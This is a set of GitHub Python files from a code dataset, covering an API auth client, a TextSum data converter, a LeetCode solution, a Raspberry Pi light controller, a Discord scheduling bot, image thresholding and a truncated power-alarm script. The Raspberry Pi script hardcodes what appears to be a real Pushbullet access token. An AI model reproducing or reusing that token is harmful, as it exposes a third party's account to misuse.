return header_split[1]\n\n\nasync def bifrost(http_request, action, name, request={}, args={}):\n context = Context(http_request)\n context.set('name', name)\n context.set('action', action)\n\n request_body = {}\n if http_request.method != \"GET\" and len(await http_request.body()):\n request_body = await http_request.json()\n else:\n request_body = dict(http_request.query_params)\n\n # preprocess request_body\n for (name,spec) in request.items():\n if name not in request_body and 'default' in spec:\n request_body[name] = spec['default']\n\n rename_key = 'map_to'\n if name in request_body and rename_key in spec:\n val = request_body.pop(name)\n request_body[spec[rename_key]] = val\n\n # append extra args to request body\n for (key,val) in args.items():\n request_body[key] = val\n\n bifrostService = await Thumbnail.from_http(http_request=http_request)\n result = await bifrostService.call(action, args=request_body)\n\n result = filter.filter_response(http_request.scope[\"endpoint\"].__name__, result)\n return result\n\n@tracer.wrap()\nasync def request_args(http_request: Request, schema=None, args=None):\n validated_args = {}\n route_name = http_request.scope['route'].name\n\n routeData = schema or app.openapi.get_route(route_name) \n required = []\n schema = {}\n\n #TODO: allow schema param to override openapi file\n\n body = await http_request.body()\n if 
http_request.method != \"GET\" and len(body):\n request_body = await http_request.json()\n Context(http_request).set('http.request_body', request_body)\n schema_request_body = routeData['requestBody']['content']['application/json']['schema']\n schema = schema_request_body['properties']\n\n if 'required' in schema_request_body:\n required = schema_request_body['required']\n\n else:\n request_body = dict(http_request.query_params)\n for param in routeData['parameters']:\n if param['in'] == 'path':\n continue\n\n schema[param['name']] = param['schema']\n if 'required' in param and param['required']:\n required.append(param['name'])\n \n args = args or {}\n\n\n # preprocess request_body\n for (name,spec) in schema.items():\n if type(spec) is str:\n spec = { 'type': spec }\n \n if name not in request_body:\n if 'default' in spec:\n request_body[name] = spec['default']\n elif name in required:\n raise AppException(\"failed to validate request arg. missing property: \" + name, \n event='ValidateRequest', status_code=400)\n \n if name in request_body:\n val = request_body[name]\n\n try:\n jsonschema.validate(val, spec)\n validated_args[name] = val\n\n except ValidationError as e:\n raise AppException(f\"failed to validate request arg. invalid property: {name}={val} : {e.message}\",\n event='ValidateRequest', status_code=400, data={name: val})\n except Exception as e:\n raise AppException(f\"failed to validate request arg. unknown error: {name}={val} : {str(e)}\",\n event='ValidateRequest', status_code=400, data={name: val})\n\n # rename\n rename_key = 'map_to'\n if name in validated_args and rename_key in spec:\n val = validated_args.pop(name)\n validated_args[spec[rename_key]] = val\n\n\n # append extra args to request body\n for (key,val) in args.items():\n validated_args[key] = val\n \n return validated_args\n\n\n\nclass Thumbnail:\n def __init__(self, token, http_request=None, validated=False, brand=None):\n\n self.token: str = token\n self.validated: bool = validated\n self.http_request: Request = http_request\n self.brand: str = brand\n \n async def args(self, schema=None):\n return await request_args(self.http_request, schema=schema)\n\n @tracer.wrap()\n async def create(token, http_request=None):\n context = Context(http_request)\n context.set('name', http_request.scope['route'].name)\n\n start_time = time.time_ns()\n auth_result = await validate(token, context=context)\n\n brand = auth_result.token_data['brand']\n\n context.set_time('auth.duration', start_time)\n if auth_result.is_valid:\n thumbnail_svc = Thumbnail(\n token=token, \n validated=True, \n http_request=http_request, \n brand=brand\n )\n return thumbnail_svc\n else:\n raise AppException(\n message=f'account does not have valid authorized token: {auth_result.message}: ',\n event='Auth.Ownership',\n status_code=403,\n )\n\n\n async def from_http(http_request):\n token = get_token(http_request) \n return await Thumbnail.create(token=token, http_request=http_request)\n\n async def call(self, action, args=None):\n self.validated = False\n\n if not self.validated:\n auth_result = await validate(self.token)\n self.validated = auth_result.is_valid\n self.brand = auth_result.token_data['brand']\n\n if self.validated:\n if not args:\n args = {}\n\n bifrostService.brand = self.brand\n\n context = Context(self.http_request)\n try:\n start_time = time.time_ns()\n context.set('bifrost.action', action)\n context.set('bifrost.details.request', args)\n result = await bifrostService.call(action, args)\n\n # details - may add config so these are 
not on by default\n context.set('bifrost.details.response', result)\n context.set('bifrost.status', 1)\n except ResourceNotFoundError as error:\n context.set('bifrost.status', 0)\n raise AppException(f'resource not found: {str(error)}', event='Bifrost.NotFound', status_code=404)\n except Exception as error:\n context.set('bifrost.status', 0)\n raise AppException(str(error), event='Bifrost.Call', exception=error)\n finally:\n context.set_time('bifrost.duration', start_time)\n\n return result\n\n else:\n raise AppException('Failed authorization before Bifrost call', event='Auth.Bifrost', status_code=403)\n","repo_name":"BhanuJogula/test","sub_path":"app/clients/bifrost/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":7870,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"721149678","text":"\"\"\"Example of Converting TextSum model data.\nUsage:\npython data_convert_example.py --command binary_to_text --in_file data/data --out_file data/text_data\npython data_convert_example.py --command text_to_binary --in_file data/text_data --out_file data/binary_data\npython data_convert_example.py --command binary_to_text --in_file data/binary_data --out_file data/text_data2\ndiff data/text_data2 data/text_data\n\"\"\"\n\nimport struct\nimport sys\n\nimport tensorflow as tf\nfrom tensorflow.core.example import example_pb2\n\nFLAGS = tf.app.flags.FLAGS\ntf.app.flags.DEFINE_string('command', 'binary_to_text',\n 'Either binary_to_text or text_to_binary.'\n 'Specify FLAGS.in_file accordingly.')\ntf.app.flags.DEFINE_string('in_file', '', 'path to file')\ntf.app.flags.DEFINE_string('out_file', '', 'path to file')\n\ndef _binary_to_text():\n reader = open(FLAGS.in_file, 'rb')\n writer = open(FLAGS.out_file, 'w')\n while True:\n len_bytes = reader.read(8)\n if not len_bytes:\n sys.stderr.write('Done reading\\n')\n return\n str_len = struct.unpack('q', len_bytes)[0]\n tf_example_str = struct.unpack('%ds' % str_len, reader.read(str_len))[0]\n tf_example = example_pb2.Example.FromString(tf_example_str)\n examples = []\n for key in tf_example.features.feature:\n examples.append('%s=%s' % (key, tf_example.features.feature[key].bytes_list.value[0]))\n writer.write('%s\\n' % '\\t'.join(examples))\n reader.close()\n writer.close()\n\n\ndef _text_to_binary():\n inputs = open(FLAGS.in_file, 'r').readlines()\n writer = open(FLAGS.out_file, 'wb')\n for inp in inputs:\n tf_example = example_pb2.Example()\n for feature in inp.strip().split('\\t'):\n (k, v) = feature.split('=')\n tf_example.features.feature[k].bytes_list.value.extend([v])\n tf_example_str = tf_example.SerializeToString()\n str_len = len(tf_example_str)\n writer.write(struct.pack('q', str_len))\n writer.write(struct.pack('%ds' % str_len, tf_example_str))\n writer.close()\n\n\ndef main(unused_argv):\n assert FLAGS.command and FLAGS.in_file and FLAGS.out_file\n if FLAGS.command == 'binary_to_text':\n _binary_to_text()\n elif FLAGS.command == 'text_to_binary':\n _text_to_binary()\n\n\nif __name__ == '__main__':\n tf.app.run()\n","repo_name":"TarrySingh/Artificial-Intelligence-Deep-Learning-Machine-Learning-Tutorials","sub_path":"tensorflow_dl_models/research/textsum/data_convert_example.py","file_name":"data_convert_example.py","file_ext":"py","file_size_in_byte":2271,"program_lang":"python","lang":"en","doc_type":"code","stars":3543,"dataset":"github-code","pt":"43"} +{"seq_id":"20260080263","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, 
next=None):\n#         self.val = val\n#         self.next = next\nclass Solution:\n    def reverseBetween(self, head: Optional[ListNode], left: int, right: int) -> Optional[ListNode]:\n        arr = []\n\n        # nothing to reverse in an empty or single-node list\n        # (the original 'head==None and head.next==None' raised an AttributeError for an empty list)\n        if head is None or head.next is None:\n            return head\n        while head:\n            arr.append(head.val)\n            head = head.next\n\n        left -= 1\n        right -= 1\n        # reverse the requested slice of values\n        arr[left:right + 1] = arr[left:right + 1][::-1]\n        # rebuild the linked list from the reordered values\n        for i in range(0, len(arr)):\n            arr[i] = ListNode(arr[i])\n        for i in range(0, len(arr) - 1):\n            arr[i].next = arr[i + 1]\n        return arr[0]\n","repo_name":"BiluAilu/A2SV-Practice","sub_path":"Data Structure/Linked List/Reverse Linked List II.py","file_name":"Reverse Linked List II.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"}
{"seq_id":"20057644400","text":"# Home Automation System : This system detects whether a person has entered the room or whether any command has been\r\n# \t\t\t provided. When a person enters the room, the IR sensor detects his/her entry and accordingly\r\n#\t\t\t switches on the light. \r\n\r\nimport RPi.GPIO as gpio\r\nimport time\r\nfrom pushbullet import Pushbullet\r\n\r\n\r\n\r\npb = Pushbullet(\"o.vGrPgqzm2rxUzcrnvyZuSbHrr9nYeD8z\")\r\ngpio.setmode(gpio.BOARD)\t\t\r\ngpio.setup(16, gpio.IN)\t\t\t#input from IR sensor\r\ngpio.setup(40, gpio.OUT)\t\t#output to electric bulb\r\ngpio.setwarnings(False)\r\ntime.sleep(1.5)\r\ntry:\r\n\tentered = False\r\n\tmsg2 = ''\t\t\t\t\t#initialise so the first iteration cannot hit an undefined name\r\n\twhile True:\r\n\t\ttime.sleep(1)\r\n\t\tpushes = pb.get_pushes()\r\n\t\tif ('body' in pushes[0].keys()):\r\n\t\t\tmsg2 = pushes[0]['body']\t\t\t#getting user command\r\n\t\tmsg1 = gpio.input(16)\t\t\t\t\t#waiting for any motion\r\n\t\tprint(msg1)\r\n\t\tif msg1 == True or msg2 == 'On': \r\n\t\t\tentered = True\r\n\t\t\tmsg2 = 'On'\r\n\t\t\tprint('Turning Lights On')\r\n\t\t\tpb.push_note(\"Home Automation System\",\"Light is On!!\")\r\n\t\t\tgpio.output(40, 0)\t\t\t\t#Relay is in NO mode hence low command to switch On\r\n\t\twhile(entered):\r\n\t\t\ttime.sleep(0.5)\r\n\t\t\tpushes = pb.get_pushes()\r\n\t\t\tif ('body' in pushes[0].keys()):\r\n\t\t\t\tmsg2 = pushes[0]['body']\r\n\t\t\tif(msg2 == 'Off'):\r\n\t\t\t\tentered = False\r\n\t\t\t\tprint('Turning Lights Off')\r\n\t\t\t\tpb.push_note(\"Home Automation System\",\"Light is Off!!\")\r\n\t\t\t\tgpio.output(40, 1)\t\t\t#Relay is in NO mode hence high command to switch Off\r\n\t\t\t\t\r\nfinally:\r\n\tgpio.cleanup()\r\n","repo_name":"Manoranjanmaharana1/Home-Automation","sub_path":"Home Automation.py","file_name":"Home Automation.py","file_ext":"py","file_size_in_byte":1455,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"}
{"seq_id":"25700115769","text":"# -*- coding: utf-8 -*-\nfrom distutils.core import setup\nimport py2exe\n\noptions = {\n    \"bundle_files\": 1,   # create single-file exe\n    \"compressed\" : 1,    # compress the library archive\n\n}\n\nsetup(\n    options = {\"py2exe\": options},\n    zipfile = None,\n    console = [\"urlutil.py\"]\n)\n","repo_name":"sejoung/urlutil","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"}
{"seq_id":"74333844290","text":"# class vowels: ## iterator\n#     vowels = {'a', 'e', 'i', 'u', 'y', 'o'}\n#     text: str\n#\n#     def __init__(self, text):\n#         self.text = text\n#         self.index = 0\n#\n#     def __iter__(self):\n#         return self\n#\n#     def 
__next__(self):\n# if self.index == len(self.text):\n# raise StopIteration\n# idx = self.index\n# self.index += 1\n# if self.text[idx].lower() in self.vowels:\n# return self.text[idx]\n# else:\n# return self.__next__()\n\n# def vowels(text): # generator func\n# vowels = {'a', 'e', 'i', 'u', 'y', 'o'}\n# for ch in text:\n# if ch.lower() in vowels:\n# yield ch\n\ndef vowels(text): # generator comprehension\n vowels = {'a', 'e', 'i', 'u', 'y', 'o'}\n return (ch for ch in text if ch.lower() in vowels)\n\n\nmy_string = vowels('Abcedifuty0o')\nfor char in my_string:\n print(char)\n","repo_name":"DeanDupalov/Softuni-Python-OOP","sub_path":"iterators_and_generators/lab/03_vowels.py","file_name":"03_vowels.py","file_ext":"py","file_size_in_byte":910,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"39206756324","text":"import os\nimport re\nimport io\nimport random\nimport asyncio\nimport discord\nimport requests\nimport schedule\nimport argparse\nimport datetime\nimport urllib.request\nimport urllib.parse\n\nfrom PIL import Image\nfrom dotenv import load_dotenv\nfrom discord.ext import commands\n\nprint(\"Starting..\")\n\nload_dotenv() \nTOKEN = os.getenv('DISCORD_TOKEN')\n\nURL = 'http://studium-bot.braun-oliver.de/studium-bot.php'\n\nbot = commands.Bot(command_prefix='.', description='A Studium Bot to manage Studying')\n \n# https://discordpy.readthedocs.io/en/latest/api.html#discord.TextChannel\n# https://discordpy.readthedocs.io/en/latest/api.html#discord.Guild\n\nmessagesToSend = []\n\ndef getSchedules():\n r = requests.get(URL)\n return [line for line in r.text.split('\\n') if line.strip() != '']\n\nasync def showHelpWrapper(ctx, title, val):\n embedVar = discord.Embed(color=0x00ff00)\n embedVar.add_field(\n name=title, \n value=val, \n inline=False)\n await ctx.send(embed=embedVar)\n\nasync def addScheduleString(str, ctx = None, checkIfExists = False) -> bool:\n \n def split(str):\n def replace(m):\n if m.group().startswith('\"'):\n return m.group()\n return m.group().replace('on', '-on').replace('at', '-at').replace('send', '-send')\n\n str = re.sub(r'\"[^\"]*\"|[^\"]+', replace, str)\n ret = []\n o = \"\"\n doubleOpen = False\n singleOpen = False\n\n for c in str:\n if c == '\"':\n doubleOpen = not doubleOpen\n elif c == \"'\":\n singleOpen = not singleOpen\n elif c == ' ' and not singleOpen and not doubleOpen:\n ret.append(o)\n o = \"\"\n else:\n o += c\n\n return ret + [o]\n \n async def showHelp(error):\n if ctx == None:\n return\n\n title = \"Error in Command: Add \" + error if (error != None) else \"Help for: Add\"\n val = \"\"\"\n usage: .add [-h | -help] on ... at ... send ...\n\n optional arguments:\n -h -help show this help message and exit\n on : Which Day? One of [Mo, [Tu | Di], [We | Mi], [Th | Do], Fr, Sa, [Su | So], every]\n at : What Time? Format like 18:10\n required arguments:\n send : What to Send? \"New Event upcoming! Join us in VC!\"\n\n example command:\n .add on Mo at 18:10 send \"New Event upcoming! 
Join us in VC!\"\n        \"\"\"\n        await showHelpWrapper(ctx, title, val)\n\n    if '-h' in str or '-help' in str:\n        await showHelp(None)\n        return False\n\n    try:\n        parser = argparse.ArgumentParser(add_help=False)\n        parser.add_argument('-on', dest='on')\n        parser.add_argument('-at', dest='at')\n        parser.add_argument('-send', dest='send', required=True)\n        args = parser.parse_args(split(str))\n\n        if checkIfExists:\n            for line in getSchedules():\n                if (f'on {args.on}' in line and f'at {args.at}' in line) or \\\n                   (f'on {args.on}' in line and args.at == None) or \\\n                   (args.on == None and f'at {args.at}' in line):\n                    if ctx != None:\n                        await ctx.send(\"There's already something scheduled at that time, please select another time.\")\n                    print(\"There's already something scheduled at that time, please select another time.\")\n                    return False\n\n        event = schedule.every()\n\n        if args.on != None:\n            # [Mo, [Tu | Di], [We | Mi], [Th | Do], Fr, Sa, [Su | So], every]\n            if args.on == 'Mo':\n                event = event.monday\n            elif args.on == 'Tu' or args.on == 'Di':\n                event = event.tuesday\n            elif args.on == 'We' or args.on == 'Mi':\n                event = event.wednesday\n            elif args.on == 'Th' or args.on == 'Do':\n                event = event.thursday\n            elif args.on == 'Fr':\n                event = event.friday\n            elif args.on == 'Sa':\n                event = event.saturday\n            elif args.on == 'Su' or args.on == 'So':\n                event = event.sunday\n            elif args.on == 'every':\n                event = event.day\n            else:\n                print('Day not recognized!')\n                await showHelp('Day not recognized!')\n\n        if args.at != None:\n            date = datetime.datetime.strptime(args.at, '%H:%M')\n            time = date - datetime.timedelta(hours=1)\n            if time.hour > date.hour:\n                await showHelp('Hour must be greater than 1 (Sorry)')\n                print('Hour must be greater than 1 (Sorry)')\n                return False\n\n            event = event.at(time.strftime('%H:%M'))\n\n        def job(msg):\n            print(\"Event happened:\", msg)\n            messagesToSend.append(msg)\n\n        event.do(job, args.send)\n        print(\"added:\", args)\n\n        return True\n\n    except Exception as e:\n        await showHelp('Exception occurred (Sorry)')\n        print(e)\n        return False\n\nasync def reload():\n    schedule.clear()\n\n    for line in getSchedules():\n        if line.strip() != '':\n            await addScheduleString(line)\n\n# Using a 3rd-party site to render TeX is not\n# the best solution, however the Google Chart\n# API is pretty stable and this method does not\n# require installing LaTeX on the local machine.\nasync def load_latex_bytes(calculation) -> io.BytesIO:\n    URL = 'https://chart.apis.google.com/chart?cht=tx&chco=white&chs=50&chf=bg,s,00000000&chco=FFFFFFFF&chl={0}'\n    query = calculation.replace('%5Cland', '%5Cwedge').replace('%5Clor', '%5Cvee').replace('%5Clnot', '%5Cneg')\n    url = URL.format(urllib.parse.quote(query))\n    bytes = urllib.request.urlopen(url).read()\n    return io.BytesIO(bytes)\n\n@bot.event\nasync def on_ready():\n    await bot.change_presence(activity=discord.Activity(type=discord.ActivityType.watching, name=\"you..\"))\n    print('We have logged in as', bot.user)\n    # Load from File\n    # TODO based on server ID\n    await reload()\n\nclass Schedule(commands.Cog):\n    \"\"\"Category documentation\"\"\"\n\n    @commands.command(name='add', help='This Command adds a message to be displayed at a specific time!')\n    async def addToSchedule(self, ctx, *, arg: str):\n        print(\"add\", len(arg.splitlines()))\n\n        # Add to Schedule\n        for line in arg.splitlines(False):\n            # str.strip('.add ') would strip any of the characters '.', 'a', 'd' and ' '\n            # from both ends, so remove only the leading command prefix instead\n            line = line.strip()\n            if line.startswith('.add'):\n                line = line[len('.add'):].strip()\n\n            added = await addScheduleString(line, ctx, True)\n\n            if added:\n                # Save to File\n                requests.post(URL, data = {'schedule':line.strip() + '\\n' })\n                await 
ctx.send('Added!')\n\n await ctx.send('Done!')\n\n @commands.command(name='list', help='Lists all running schedules')\n async def list(self, ctx):\n print(\"list\")\n\n embedVar = discord.Embed(title=\"Schedules\", color=0x00ff00)\n\n def search(line:str):\n d = { \n 'Mo': 1, \n 'Tu': 2, 'Di': 2,\n 'We': 3, 'Mi': 3,\n 'Th': 4, 'Do': 4,\n 'Fr': 5,\n 'Sa': 6,\n 'Su': 7, 'So': 7,\n 'every': 8,\n }\n tokens = line.split()\n key = ''\n if 'on' in tokens:\n key += str(d[tokens[tokens.index('on') + 1]])\n if 'at' in tokens:\n key += ' ' + tokens[tokens.index('at') + 1].rjust(5, '0')\n return key\n \n lines = getSchedules()\n lines.sort(key=search)\n\n schedules = {}\n for line in lines:\n if not 'on' in line:\n if not 'On Time' in schedules:\n schedules['On Time'] = []\n schedules['On Time'].append(line)\n else:\n tokens = line.split()\n idx = tokens.index('on')\n key = 'On ' + tokens[idx + 1]\n tokens = tokens[:idx] + tokens[idx + 2:]\n if not key in schedules:\n schedules[key] = []\n schedules[key].append(' '.join(tokens))\n \n for k, v in schedules.items():\n embedVar.add_field(name=k, value='\\n'.join(v), inline=False)\n await ctx.send(embed=embedVar)\n\n @commands.command(name='clear', help='Clears all running schedules')\n async def clear(self, ctx):\n print(\"clear\")\n requests.post(URL, data = {'clear':'true'})\n schedule.clear()\n await ctx.send(\"Cleared Schedule!\")\n\n @commands.command(name='rem', help='Removes a schedule')\n async def rem(self, ctx, *, arg):\n print(\"rem\")\n\n if '-h' in arg or '-help' in arg:\n title = \"Help for: Rem\"\n val = \"\"\"\n usage: .rem [-h | -help] idx | str\n\n optional arguments:\n -h -help show this help message and exit\n required arguments:\n idx : Index of schedule to be removed (0 based)\n str : String representation of schedule to be removed\n\n example command:\n .rem 0\n .rem on Mo at 18:10 send \"New Event upcoming! 
Join us in VC!\"\n \"\"\"\n await showHelpWrapper(ctx, title, val)\n return\n \n lines = getSchedules()\n requests.post(URL, data = {'clear':'true'})\n\n idx = int(arg) if arg.isdigit() else None\n removed = False\n for i, line in enumerate(lines):\n if idx != i and line != arg.strip():\n requests.post(URL, data = {'schedule':line + '\\n'})\n else:\n await ctx.send(\"Removed from Schedule!\")\n removed = True\n\n if not removed:\n await ctx.send(\"Nothing Removed from Schedule!\")\n \n # reload remaining schedules\n await reload()\n \n @commands.command(name='reload', help='Reload all Schedules from File')\n async def reload(self, ctx):\n print(\"reload\")\n await reload()\n await ctx.send(\"Reloaded Schedule!\")\n \n @commands.command(name='dump', help='Dumps all Schedules to Chat')\n async def dump(self, ctx):\n print(\"dump\") \n\n data = ''\n for line in getSchedules():\n data += '.add ' + line + '\\n'\n\n embedVar = discord.Embed(color=0x00ff00) \n embedVar.add_field(\n name=\"Schedule Dump\", \n value=data, \n inline=False)\n await ctx.send(embed=embedVar)\n\n @commands.command(name='setup', help='Setup the Bot')\n async def setup(self, ctx):\n print(\"setup\")\n # TODO set channel\n # TODO set prefix\n pass\n\nclass Util(commands.Cog):\n @commands.command(name='display', help='Display information about Server')\n async def display(self, ctx):\n print(\"display\")\n\n embedVar = discord.Embed(title=\"Discord Data\", color=0x00ff00)\n embedVar.add_field(\n name=\"Guild\", \n value=str(ctx.guild) + ' ' + str(ctx.guild.id), \n inline=False)\n embedVar.add_field(\n name=\"Channel\", \n value=str(ctx.channel) + ' ' + str(ctx.channel.id), \n inline=False)\n embedVar.add_field(\n name=\"Author\", \n value=str(ctx.author) + ' ' + str(ctx.me), \n inline=False)\n await ctx.send(embed=embedVar)\n \n @commands.command(name='clearchat', help='Clears Messages of current channel')\n async def clearchat(self, ctx, number = None):\n print(\"clearchat\")\n\n number = 1000 if number == None else int(number) + 1\n await ctx.channel.purge(limit=number)\n \n @commands.command(name='hol', help='Pings provided User in each channel')\n async def hol(self, ctx, user):\n print(\"hol\")\n\n for channel in ctx.guild.text_channels:\n await channel.send(\"Komm mal her \" + user + \"!\")\n \n @commands.command(name='latex', help='Renderes the entered Calculation based on Latex format')\n async def latex(self, ctx, *, calculation):\n print(\"latex\", calculation)\n await ctx.message.delete()\n try:\n bytes = await load_latex_bytes(calculation)\n filename = '{}.png'.format(calculation)\n await ctx.message.channel.send(f'***{ctx.message.author.name}***\\n.latex {calculation}', file=discord.File(bytes, filename=filename))\n except:\n await ctx.send('Failed to Render calculation: ' + calculation)\n\n \nasync def loop():\n while True:\n # Channel bot-notifications\n # TODO Based on server ID -> also only send messages that are supposed to go to that server\n schedule.run_pending()\n\n channel = bot.get_channel(772952750668382238)\n\n for str in messagesToSend:\n print(\"sending\", str)\n await channel.send(str)\n\n messagesToSend.clear()\n \n # sleep until next minute starts\n now = datetime.datetime.now()\n lastMin = now.replace(second=5)\n seconds = max((now - lastMin).seconds, 0)\n # sleep full minute - seconds passed in this minute\n # await asyncio.sleep(60 - seconds)\n await 
asyncio.sleep(1)\n\n\nbot.loop.create_task(loop())\nbot.add_cog(Schedule())\nbot.add_cog(Util())\nbot.run(TOKEN)\n","repo_name":"BertilBraun/StudiumBot","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":13422,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"22728319468","text":"from cv2 import (\n imread, adaptiveThreshold, ADAPTIVE_THRESH_MEAN_C, THRESH_BINARY,\n cvtColor, COLOR_BGR2GRAY, COLOR_BGR2RGB, inRange, kmeans,\n TERM_CRITERIA_EPS, TERM_CRITERIA_MAX_ITER, KMEANS_RANDOM_CENTERS\n)\nfrom numpy import dstack, array, uint8, float32\nimport matplotlib.pyplot as plt\n\ndef threshold(image, th):\n return [[0 if cell < th else 255 for cell in row] for row in image]\n\nimg = imread('../resource/fight_club.jpg')\n\ncriteria = (TERM_CRITERIA_MAX_ITER + TERM_CRITERIA_EPS, 10, 1.0)\n\nimg_gray = cvtColor(img, COLOR_BGR2GRAY)\nimg_rgb = cvtColor(img, COLOR_BGR2RGB)\n\nZ = img_rgb.reshape((-1, 3))\n\nret, label, center = kmeans(float32(Z), 2, None, criteria, 8, KMEANS_RANDOM_CENTERS)\n\ncenter = uint8(center)\nres = center[label.flatten()]\nimg_kmean = res.reshape((img_rgb.shape))\n\nret, label, center = kmeans(float32(Z), 4, None, criteria, 8, KMEANS_RANDOM_CENTERS)\n\ncenter = uint8(center)\nres = center[label.flatten()]\nimg_kmean_4 = res.reshape((img_rgb.shape))\n\nimg_rgb_threshold = inRange(img_rgb, array([10, 0, 5]), array([100, 100, 100]))\n\nplt.subplot(231)\nplt.title('Original image')\nplt.imshow(img_rgb)\n\nplt.subplot(232)\nplt.title('K-means clustering (K=2)')\nplt.imshow(img_kmean)\n\nplt.subplot(233)\nplt.title('K-means clustering (K=4)')\nplt.imshow(img_kmean_4)\n\nplt.subplot(234)\nplt.title('Thresholded color image')\nplt.imshow(img_rgb_threshold, cmap='gray')\n\nplt.subplot(235)\nplt.title('Simple thresholding (gray)')\nplt.imshow(threshold(img_gray, 100), cmap='gray')\n\nplt.subplot(236)\nplt.title('Adaptive threshold (gray)')\nplt.imshow(adaptiveThreshold(img_gray, 255, ADAPTIVE_THRESH_MEAN_C, THRESH_BINARY, 25, 12), cmap='gray')\n\nplt.show()\n","repo_name":"Huy-Ngo/DIP-labwork","sub_path":"labwork_2/ex3.py","file_name":"ex3.py","file_ext":"py","file_size_in_byte":1670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"39141704137","text":"#/usr/bin/python\n_copyright__ = '''\nCopyright 2020 Andre C. Neto\n\nPermission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the 'Software'), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED 'AS IS', WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\n'''\n__license__ = 'MIT'\n__author__ = 'Andre C. 
Neto'\n__date__ = '01/06/2020'\n\nimport argparse\nimport logging\nimport logging.handlers\nimport odroid_wiringpi as wpi\nimport smtplib, ssl\nimport time\n\nfrom enum import Enum\n\n#Configure the logging format\ndateFormat = '%Y-%m-%d %H:%M:%S'\nloggingFormat = logging.Formatter(fmt='[%(asctime)s] [%(levelname)s] [%(process)d] [%(filename)s:%(lineno)d] %(message)s', datefmt=dateFormat)\n\n#Configure the logger\nlogger = logging.getLogger('{0}'.format(__name__))\n\n#Console handler\nconsoleHandler = logging.StreamHandler()\nconsoleHandler.setFormatter(loggingFormat)\n\n#Syslog handler\nsyslogHandler = logging.handlers.SysLogHandler('/dev/log')\nsyslogHandler.setFormatter(loggingFormat)\n\nlogger.addHandler(consoleHandler)\nlogger.addHandler(syslogHandler)\n\n#Possible application states\nclass AlarmState(Enum):\n    OK = 1\n    ALARMING_VOLTAGE = 2\n    ALARM = 3\n\n#Template class for alarms\nclass AlarmHandler(object):\n\n    def __init__(self):\n        #NOOP - template class, not meant to be instantiated directly\n        logger.critical('NOOP')\n\n    def trigger(self, msg, severity):\n        #NOOP - subclasses must override trigger\n        logger.critical('Should not be reachable')\n\nclass BuzzerAlarmHandler(AlarmHandler):\n\n    def __init__(self, alarmPin, alarmDuration):\n        self.tones = [650, 900]\n        self.toneDuration = [0.4, 0.6]\n        self.duration = alarmDuration\n        self.pin = alarmPin\n        wpi.pinMode(self.pin, 1)\n\n    def trigger(self, msg, severity):\n        if (severity >= logging.ERROR):\n            logger.info('Triggering buzzer siren')\n            wpi.softToneCreate(self.pin)\n            startTime = time.time()\n            endTime = startTime + self.duration\n            while(time.time() < endTime):\n                for (toneFrequency, toneDuration) in zip(self.tones, self.toneDuration):\n                    wpi.softToneWrite(self.pin, toneFrequency)\n                    time.sleep(toneDuration)\n            wpi.softToneStop(self.pin)\n            logger.info('Buzzer siren finished')\n\nclass EMailAlarmHandler(AlarmHandler):\n\n    def __init__(self, username, password, destination):\n        self.emailUsername = username\n        self.emailPassword = password\n        self.emailDestination = destination\n        self.messageSubject = 'Power detector event'\n        self.port = 587\n        self.smtpServer = 'smtp.gmail.com'\n        self.loggingStrings = {logging.NOTSET: 'NOTSET', logging.DEBUG: 'DEBUG', logging.INFO: 'INFO', logging.WARNING: 'WARNING', logging.ERROR: 'ERROR', logging.CRITICAL: 'CRITICAL'}\n\n    def getLoggingString(self, severity):\n        ret = self.loggingStrings[logging.NOTSET]\n        if (severity in self.loggingStrings):\n            ret = self.loggingStrings[severity]\n        return ret\n\n    def trigger(self, msg, severity):\n        try:\n            #context = ssl.create_default_context()\n            #server = smtplib.SMTP_SSL(smtpServer, port, context)\n\n            server = smtplib.SMTP(self.smtpServer, self.port)\n            server.ehlo()\n            server.starttls()\n            server.login(self.emailUsername, self.emailPassword)\n\n            message = '\\r\\n'.join([\n                'From: {0}'.format(self.emailUsername),\n                'To: {0}'.format(self.emailDestination),\n                'Subject: {0} - {1}'.format(self.messageSubject, self.getLoggingString(severity)),\n                '',\n                '{0}'.format(msg)\n            ])\n            server.sendmail(self.emailUsername, self.emailDestination.split(','), message)\n            server.quit()\n        except Exception as e:\n            logger.critical('Failed to send e-mail {0}'.format(e))\n\ndef monitor(adcNumber, readPeriodState, alarmMinVoltage, alarmNTriggers, alarmHandlers, infoPeriod):\n    msg = 'Going to read from ADC {0} with a period of {1} seconds. 
